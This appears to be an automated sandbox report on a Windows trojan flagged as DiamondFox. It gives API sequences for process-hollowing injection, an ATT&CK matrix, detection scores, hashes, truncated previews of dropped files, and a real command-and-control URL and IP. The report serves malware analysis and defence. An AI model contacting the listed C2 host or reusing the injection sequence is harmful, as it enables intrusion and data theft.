    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_004039B7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetCurrentProcessId,CloseHandle,2_2_004039B7
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_00412C47 LoadLibraryW,GetProcAddress,memset,FreeLibrary,LoadLibraryW,GetProcAddress,FreeLibrary,2_2_00412C47

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Contains functionality to inject code into remote processesShow sources
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_00407EA1 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,2_2_00407EA1
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0040A1B0 cpuid 2_2_0040A1B0
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_004E7BC6 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_004E7BC6
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0040C5E3 GetUserNameW,2_2_0040C5E3
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeCode function: 1_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403348

    Stealing of Sensitive Information:

    barindex
    Yara detected DiamondfoxShow sources
    Source: Yara matchFile source: Process Memory Space: CachemanControlPanel.exe PID: 6988, type: MEMORY

    Remote Access Functionality:

    barindex
    Yara detected DiamondfoxShow sources
    Source: Yara matchFile source: Process Memory Space: CachemanControlPanel.exe PID: 6988, type: MEMORY

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsNative API11Path InterceptionAccess Token Manipulation1Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection11Virtualization/Sandbox Evasion31LSASS MemorySecurity Software Discovery121Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Access Token Manipulation1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemFile and Directory Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery15Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    dY5HmgsBm6.exe49%VirustotalBrowse
    dY5HmgsBm6.exe6%MetadefenderBrowse
    dY5HmgsBm6.exe34%ReversingLabsWin32.Trojan.Wacatac

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe6%MetadefenderBrowse
    C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe14%ReversingLabsWin32.Malware.Bulz
    C:\Users\user\AppData\Roaming\CachemanControlPanel\Qt5Concurrentd.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\CachemanControlPanel\libblkmaker-0.1-6.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Roaming\CachemanControlPanel\libblkmaker-0.1-6.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\CachemanControlPanel\libgcc_s_seh-1.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Roaming\CachemanControlPanel\libgcc_s_seh-1.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\CachemanControlPanel\libgraph31.dll12%MetadefenderBrowse
    C:\Users\user\AppData\Roaming\CachemanControlPanel\libgraph31.dll34%ReversingLabsWin32.Trojan.Bulz
    C:\Users\user\AppData\Roaming\CachemanControlPanel\libgstcontroller-1.0-0.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\CachemanControlPanel\libogg-0.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Roaming\CachemanControlPanel\libogg-0.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\CachemanControlPanel\libxml3.dll12%MetadefenderBrowse
    C:\Users\user\AppData\Roaming\CachemanControlPanel\libxml3.dll21%ReversingLabsWin32.Trojan.Bulz
    C:\Users\user\AppData\Roaming\CachemanControlPanel\vcruntime140.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Roaming\CachemanControlPanel\vcruntime140.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\CachemanControlPanel\zlib.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Roaming\CachemanControlPanel\zlib.dll0%ReversingLabs

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    1.2.dY5HmgsBm6.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
    1.0.dY5HmgsBm6.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

    Domains

    SourceDetectionScannerLabelLink
    vladisfoxlink.ru9%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://ip.seeip.org/1%VirustotalBrowse
    https://ip.seeip.org/0%Avira URL Cloudsafe
    https://ip.seeip.org/Content-Type:0%Avira URL Cloudsafe
    http://vladisfoxlink.ru/support/enfr/gate.phpte.phpK0%Avira URL Cloudsafe
    http://vladisfoxlink.ru/support/enfr/gate.php0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    api.globalsign.cloud
    104.18.24.243
    truefalse
      unknown
      vladisfoxlink.ru
      45.85.90.225
      truetrueunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://vladisfoxlink.ru/support/enfr/gate.phptrue
      • Avira URL Cloud: safe
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://ip.seeip.org/CachemanControlPanel.exefalse
      • 1%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://bitsum.com/CachemanControlPanel.exe, 00000002.00000000.326512498.00000000006FD000.00000002.00020000.sdmp, CachemanControlPanel.exe.1.drfalse
        high
        http://nsis.sf.net/NSIS_ErrordY5HmgsBm6.exefalse
          high
          http://nsis.sf.net/NSIS_ErrorErrordY5HmgsBm6.exefalse
            high
            https://ip.seeip.org/Content-Type:CachemanControlPanel.exe, 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.zlib.net/DdY5HmgsBm6.exe, 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp, zlib.dll.1.drfalse
              high
              http://vladisfoxlink.ru/support/enfr/gate.phpte.phpKCachemanControlPanel.exe, 00000002.00000003.463261074.0000000002A84000.00000004.00000040.sdmptrue
              • Avira URL Cloud: safe
              unknown
              https://bitsum.com/3CurrentCachemanControlPanel.exe, 00000002.00000000.326512498.00000000006FD000.00000002.00020000.sdmp, CachemanControlPanel.exe.1.drfalse
                high
                https://bitsum.comCachemanControlPanel.exe, CachemanControlPanel.exe, 00000002.00000000.326512498.00000000006FD000.00000002.00020000.sdmp, CachemanControlPanel.exe.1.drfalse
                  high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  45.85.90.225
                  vladisfoxlink.ruNetherlands
                  32181ASN-GIGENETUStrue

                  General Information

                  Joe Sandbox Version:31.0.0 Emerald
                  Analysis ID:397764
                  Start date:26.04.2021
                  Start time:11:48:27
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 7m 23s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:dY5HmgsBm6 (renamed file extension from none to exe)
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:21
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal96.troj.evad.winEXE@3/12@1/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 100% (good quality ratio 96.5%)
                  • Quality average: 82.7%
                  • Quality standard deviation: 25.6%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                  • Excluded IPs from analysis (whitelisted): 52.147.198.201, 131.253.33.200, 13.107.22.200, 104.43.193.48, 23.211.6.115, 52.255.188.83, 93.184.221.240, 20.82.210.154, 92.122.213.194, 92.122.213.247, 52.155.217.156, 205.185.216.10, 205.185.216.42, 20.54.26.129, 184.30.20.56, 20.82.209.183
                  • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, ocsp.msocsp.com, 2-01-3cf7-0009.cdx.cedexis.net, store-images.s-microsoft.com-c.edgekey.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, cs11.wpc.v0cdn.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, download.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, hostedocsp.globalsign.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  11:49:17API Interceptor511x Sleep call for process: CachemanControlPanel.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  45.85.90.225kU110zA27l.exeGet hashmaliciousBrowse
                    SecuriteInfo.com.W32.AIDetect.malware1.14311.exeGet hashmaliciousBrowse
                      reawz09cwj_DOC0107210_AGOSTO.docGet hashmaliciousBrowse

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        api.globalsign.cloudQuotation ATB-PR28500KINH.exeGet hashmaliciousBrowse
                        • 104.18.25.243
                        4831902122_p.exeGet hashmaliciousBrowse
                        • 104.18.25.243
                        edLJhIqx8C.exeGet hashmaliciousBrowse
                        • 104.18.24.243
                        4x1cYP0PFs.exeGet hashmaliciousBrowse
                        • 104.18.24.243
                        DOCUMENTS.exeGet hashmaliciousBrowse
                        • 104.18.24.243
                        DHL20212204_PDF.exeGet hashmaliciousBrowse
                        • 104.18.24.243
                        WaybillDoc_5736357561.pdf.exeGet hashmaliciousBrowse
                        • 104.18.25.243
                        SecuriteInfo.com.Trojan.PackedNET.677.32317.exeGet hashmaliciousBrowse
                        • 104.18.24.243
                        1PGSqP9ZbC.exeGet hashmaliciousBrowse
                        • 104.18.25.243
                        Yorauv6del.exeGet hashmaliciousBrowse
                        • 104.18.25.243
                        Statistiken-04.20.21.docGet hashmaliciousBrowse
                        • 104.18.25.243
                        042021.htmGet hashmaliciousBrowse
                        • 104.18.25.243
                        catalog-1840888847.xlsmGet hashmaliciousBrowse
                        • 104.18.24.243
                        PO# 127119QUOTATION N 00319.pdf.exeGet hashmaliciousBrowse
                        • 104.18.25.243
                        list015-PO#M0819T_pdf.jarGet hashmaliciousBrowse
                        • 104.18.24.243
                        CSV AUHR001335017.exeGet hashmaliciousBrowse
                        • 104.18.25.243
                        NEWURGENTORDER.exeGet hashmaliciousBrowse
                        • 104.18.25.243
                        new file 1.exeGet hashmaliciousBrowse
                        • 104.18.24.243
                        EXONE 2606202201.exeGet hashmaliciousBrowse
                        • 104.18.25.243
                        DHL Delivery Documents.exeGet hashmaliciousBrowse
                        • 104.18.24.243
                        vladisfoxlink.rukU110zA27l.exeGet hashmaliciousBrowse
                        • 45.85.90.225
                        SecuriteInfo.com.W32.AIDetect.malware1.14311.exeGet hashmaliciousBrowse
                        • 45.85.90.225
                        reawz09cwj_DOC0107210_AGOSTO.docGet hashmaliciousBrowse
                        • 45.85.90.225
                        SecuriteInfo.com.Trojan.GenericKD.46105395.24334.exeGet hashmaliciousBrowse
                        • 45.85.90.7
                        qbsubf8fng_AGOSTO_DOC21408001.docGet hashmaliciousBrowse
                        • 45.85.90.7

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        ASN-GIGENETUSDFI_0451_587_032.docGet hashmaliciousBrowse
                        • 45.85.90.14
                        DFI0451587032.exeGet hashmaliciousBrowse
                        • 45.85.90.14
                        kU110zA27l.exeGet hashmaliciousBrowse
                        • 45.85.90.225
                        GO1eovBADG.exeGet hashmaliciousBrowse
                        • 45.85.90.92
                        SecuriteInfo.com.W32.AIDetect.malware1.14311.exeGet hashmaliciousBrowse
                        • 45.85.90.225
                        reawz09cwj_DOC0107210_AGOSTO.docGet hashmaliciousBrowse
                        • 45.85.90.225
                        juFSQ6AmWQ.exeGet hashmaliciousBrowse
                        • 45.85.90.92
                        ADNOC_ RFQ N#U00ba 100400806-02.exeGet hashmaliciousBrowse
                        • 45.85.90.242
                        Specification of 0974A02-01 0975A02-01 RFQ (2.exeGet hashmaliciousBrowse
                        • 45.85.90.235
                        SecuriteInfo.com.Trojan.GenericKD.46105395.24334.exeGet hashmaliciousBrowse
                        • 45.85.90.7
                        qbsubf8fng_AGOSTO_DOC21408001.docGet hashmaliciousBrowse
                        • 45.85.90.7
                        bins.shGet hashmaliciousBrowse
                        • 45.85.90.131
                        Goody b.exeGet hashmaliciousBrowse
                        • 69.65.3.206
                        MT103_Swift-confirmation#4425-28373XXX.exeGet hashmaliciousBrowse
                        • 45.85.90.86
                        PAYMENT CONFIRMATION.exeGet hashmaliciousBrowse
                        • 69.65.3.206
                        MT103_Swift_Transfer#452-567-2XXX.exeGet hashmaliciousBrowse
                        • 45.85.90.86
                        4IxLUYjMQ7.exeGet hashmaliciousBrowse
                        • 172.111.237.51
                        payment details.exeGet hashmaliciousBrowse
                        • 69.65.3.206
                        payment details.exeGet hashmaliciousBrowse
                        • 69.65.3.206
                        AWB-9899691012.exeGet hashmaliciousBrowse
                        • 45.85.90.220

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        C:\Users\user\AppData\Roaming\CachemanControlPanel\libblkmaker-0.1-6.dllkU110zA27l.exeGet hashmaliciousBrowse
                          SecuriteInfo.com.W32.AIDetect.malware1.14311.exeGet hashmaliciousBrowse
                            reawz09cwj_DOC0107210_AGOSTO.docGet hashmaliciousBrowse
                              C:\Users\user\AppData\Roaming\CachemanControlPanel\Qt5Concurrentd.dllkU110zA27l.exeGet hashmaliciousBrowse
                                SecuriteInfo.com.W32.AIDetect.malware1.14311.exeGet hashmaliciousBrowse
                                  reawz09cwj_DOC0107210_AGOSTO.docGet hashmaliciousBrowse
                                    C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exekU110zA27l.exeGet hashmaliciousBrowse
                                      SecuriteInfo.com.W32.AIDetect.malware1.14311.exeGet hashmaliciousBrowse
                                        reawz09cwj_DOC0107210_AGOSTO.docGet hashmaliciousBrowse
                                          C:\Users\user\AppData\Roaming\CachemanControlPanel\libgraph31.dllkU110zA27l.exeGet hashmaliciousBrowse
                                            SecuriteInfo.com.W32.AIDetect.malware1.14311.exeGet hashmaliciousBrowse
                                              reawz09cwj_DOC0107210_AGOSTO.docGet hashmaliciousBrowse
                                                C:\Users\user\AppData\Roaming\CachemanControlPanel\libgcc_s_seh-1.dllkU110zA27l.exeGet hashmaliciousBrowse
                                                  SecuriteInfo.com.W32.AIDetect.malware1.14311.exeGet hashmaliciousBrowse
                                                    reawz09cwj_DOC0107210_AGOSTO.docGet hashmaliciousBrowse

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe
                                                      Process:C:\Users\user\Desktop\dY5HmgsBm6.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3345920
                                                      Entropy (8bit):6.587937511995749
                                                      Encrypted:false
                                                      SSDEEP:49152:RU18F61w5Ts0AzHc8ZqfV7xPmljnjWwIZnQjH0xe0bQBTAMUlZyu:ifSXmHc8ctVPmZnj7IywZF
                                                      MD5:5D3BF7A18887582B8A2CEA327F2E7BA6
                                                      SHA1:83843851B7B7BEB2B1853B813E7F0B1666B1BD62
                                                      SHA-256:014D644ECCC232CD6906C5ABF8AFD3E53F94004057D4A1BB2771DFEA00F0AE4B
                                                      SHA-512:3D4FFC844B211FAE199F3DA8B557CEC2F6E882B8BE42F3D99882EAA3E9D73018F8C06971CB783D223F3423D0C55788B7520BD57FD33D8D2DFE6C4BE9455E62D7
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Metadefender, Detection: 6%, Browse
                                                      • Antivirus: ReversingLabs, Detection: 14%
                                                      Joe Sandbox View:
                                                      • Filename: kU110zA27l.exe, Detection: malicious, Browse
                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware1.14311.exe, Detection: malicious, Browse
                                                      • Filename: reawz09cwj_DOC0107210_AGOSTO.doc, Detection: malicious, Browse
                                                      Reputation:low
                                                      Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......$C..`"..`"..`"..;J..j"..;J..."..;J..r"...S..B"...S..o"...S..q"..;J..c"..`"..1"...P..c"...P..a"...P".a"...P..a"..Rich`"..!ep. e...... e..Rich!e..................PE..L......`.................x&.........dh........&...@...........................3.................................................P.....0.\.............................+.p.....................+.....0.+.@.............&.t............................text...Dv&......x&................. ....rdata..0.....&......|&.............@..@.data...@.... ......................@..._RDATA...&..../..(..../.............@..@.rsrc...\.....0......2/.............@..@........................................................................................................................................................................................................................................................................
                                                      C:\Users\user\AppData\Roaming\CachemanControlPanel\Qt5Concurrentd.dll
                                                      Process:C:\Users\user\Desktop\dY5HmgsBm6.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):76272
                                                      Entropy (8bit):5.173103233206012
                                                      Encrypted:false
                                                      SSDEEP:1536:qDmWfeg9w00eRovEaEI5Zs8kJqsJpni/xCGWL/ftUfT:iu00eR6EaEI5Zs8kJqsJpni/xCGWLnA
                                                      MD5:2378A50282D97268DA9EF31E5850F44A
                                                      SHA1:96F5657D700769370E7DA406321DEB80E3A782A5
                                                      SHA-256:EBA986E025DEB2B5E7E16D69A7F6E8266C5D3576074B36FDF4FD8CCC90824C7C
                                                      SHA-512:65D63594F7406055E5CF24F53AE6987B9D4CF95189CB0705A33BBE8C358D7AA1FE169B121F723063ADD2548464CBAA8FB5E6B790B75407D6ECC2CB73621AF790
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Joe Sandbox View:
                                                      • Filename: kU110zA27l.exe, Detection: malicious, Browse
                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware1.14311.exe, Detection: malicious, Browse
                                                      • Filename: reawz09cwj_DOC0107210_AGOSTO.doc, Detection: malicious, Browse
                                                      Reputation:low
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....w...w...w..v...w...v...w..r...w..s...w..t...w...v...w...v.W.w...r...w...w...w.......w.......w...u...w.Rich..w.........PE..L...3._...........!.........r.....................f.........................P.......Y....@.........................0..._.......d....0.......................@......,...8...........................h...@............................................text...g........................... ..`.rdata...E.......F..................@..@.data...............................@....idata..............................@..@.00cfg....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................
                                                      C:\Users\user\AppData\Roaming\CachemanControlPanel\dxgi.dll
                                                      Process:C:\Users\user\Desktop\dY5HmgsBm6.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):76267
                                                      Entropy (8bit):7.9942102850463606
                                                      Encrypted:true
                                                      SSDEEP:1536:LTC1hHQ8Ol3smLKj45olGALbifbtboj7AN4dxcPyQl9T/PdxvQe2gBqwklpQCF7:3Cxd7VlGAq5knAsCTLo/cqw6pP7
                                                      MD5:87C8CC0F69619E3706B7B0F429D82263
                                                      SHA1:88D543A169CD919874C914F5CAABE561BCE2E907
                                                      SHA-256:34CC061FC29D7AF780331DCDEE70BA57925E235AEB45DAC6710CC3A3F78914C2
                                                      SHA-512:5B9290317C2F04EB2FC9F87E671BF892383733480D0A0D90D898E399E0D97A1C4CBC113ABAE32BC97749BC573D292C624E7BA7F37970B8CA025E06FB85678C36
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview: DCD...98....PA30........N..?.."8`...............h}L.j..,............*..*................".*............o............(...............,...033.133333.3..3.3333..0......33......G@..]..W'........?...-.?..P....4..t..r.-.........p %.eA..D.)..3..M`=x.$.Y..%.......Y.....?.a..Q.,....Q.0.G.;3..;s...fa..#..=.{07...3gh[.....0g....9g..8,.9...6.Y..0.;..u7.n.%...93w.~....Y....v....Q0kcFz8ksPD...f.#@..b.......l....f.....(8.....`..e.:.a..tf...F..a.9.....q.s.=<,..)G=..?<...0..............wi.p.(..h..#,T.....H.a....<.0...(..i.B..2.B..:.BA..1...5.z(...b.0.....!..++.d.1n6.nc..m....3[.=.}.6....hc.."{..21..8.U...&.....g.m.....\......O.le..R.83.....Ec. .0.'..|.|.F.N...).m..I...1....`..,.?.".^...Yf...B.....7Co...rs....>+.ene..n.lnc.g.9/.[Ivs3i.I.n.m>{..v7.0............3'.......8...P........H.:Y.U...A..b..1.1.H.f....1.9?f...y..{..-..K..........w..i...G(.*h...J......&..$.j.Mn.....o....w....q....3...|..n3....Gc..M.e&}7..6...t.4~...g.f1s....{|Fz...'5.No......}.
                                                      C:\Users\user\AppData\Roaming\CachemanControlPanel\libblkmaker-0.1-6.dll
                                                      Process:C:\Users\user\Desktop\dY5HmgsBm6.exe
                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):76188
                                                      Entropy (8bit):5.153637021115198
                                                      Encrypted:false
                                                      SSDEEP:768:OCXGtEGupmGP9FAnIbGVgNy5dbOdr63EKcoD1vQIxxfIXdt:OFgcMAWGVgNy5dbOBJCQIxxgXdt
                                                      MD5:C724B7986C72EA00CEA20E4EEA4E0C84
                                                      SHA1:E5D823BE1B32561617F34078F45CB2AFD5331FEB
                                                      SHA-256:7CF28A256B6A462546DB89E2C8C8A70D0D759FE62567AF20BDDF57E63D4963B7
                                                      SHA-512:08B549A9DE0D4B28807070CE8BA2ECD5F74225BF0F434E91E3E544DA60A603D079A504735D5F4E10F2AD29F97BBFBF6A7B91E3265B249FD56BAF92E33B2769FE
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Joe Sandbox View:
                                                      • Filename: kU110zA27l.exe, Detection: malicious, Browse
                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware1.14311.exe, Detection: malicious, Browse
                                                      • Filename: reawz09cwj_DOC0107210_AGOSTO.doc, Detection: malicious, Browse
                                                      Reputation:low
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....2.V....a.....& .....<... .................p.............................................. .........................................Q.......p............p..................\........................... ...(....................................................text...0;.......<.................. .P`.data........P.......B..............@.`..rdata.......`.......D..............@.P@.pdata.......p.......H..............@.0@.xdata..,............L..............@.0@.bss....P.............................`..edata..Q............P..............@.0@.idata..p............T..............@.0..CRT....X............\..............@.@..tls....h............^..............@.`..reloc..\............`..............@.0B/4...................b..............@.PB/19.....$8.......:...d..............@..B/31..........@......................@..B/45.....:....P......................@..B/57.....
                                                      C:\Users\user\AppData\Roaming\CachemanControlPanel\libgcc_s_seh-1.dll
                                                      Process:C:\Users\user\Desktop\dY5HmgsBm6.exe
                                                      File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                      Category:dropped
                                                      Size (bytes):76288
                                                      Entropy (8bit):6.121662939383189
                                                      Encrypted:false
                                                      SSDEEP:1536:TVhSLCst8rZQk8HzR8+lXbPtccSPOrBT3SIKBx:itu7+lOcCO1TI/
                                                      MD5:534B365361004828059600F05B34006D
                                                      SHA1:D8FF411B0939A021F47C845C6A90F1240BAB5268
                                                      SHA-256:438AE82FFD621A2413199155574CC85681F8986F05420B1485AA4BE936C3BC0B
                                                      SHA-512:1CCB3732A82F2FEDCA85C27AFDD48E65DDE70D5B1620E436D457624A2CB796887C5E7DC2983A0794EBBBCADE3E5B9F9FC9320B390894471993C7B1E85268592D
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Joe Sandbox View:
                                                      • Filename: kU110zA27l.exe, Detection: malicious, Browse
                                                      • Filename: SecuriteInfo.com.W32.AIDetect.malware1.14311.exe, Detection: malicious, Browse
                                                      • Filename: reawz09cwj_DOC0107210_AGOSTO.doc, Detection: malicious, Browse
                                                      Reputation:low
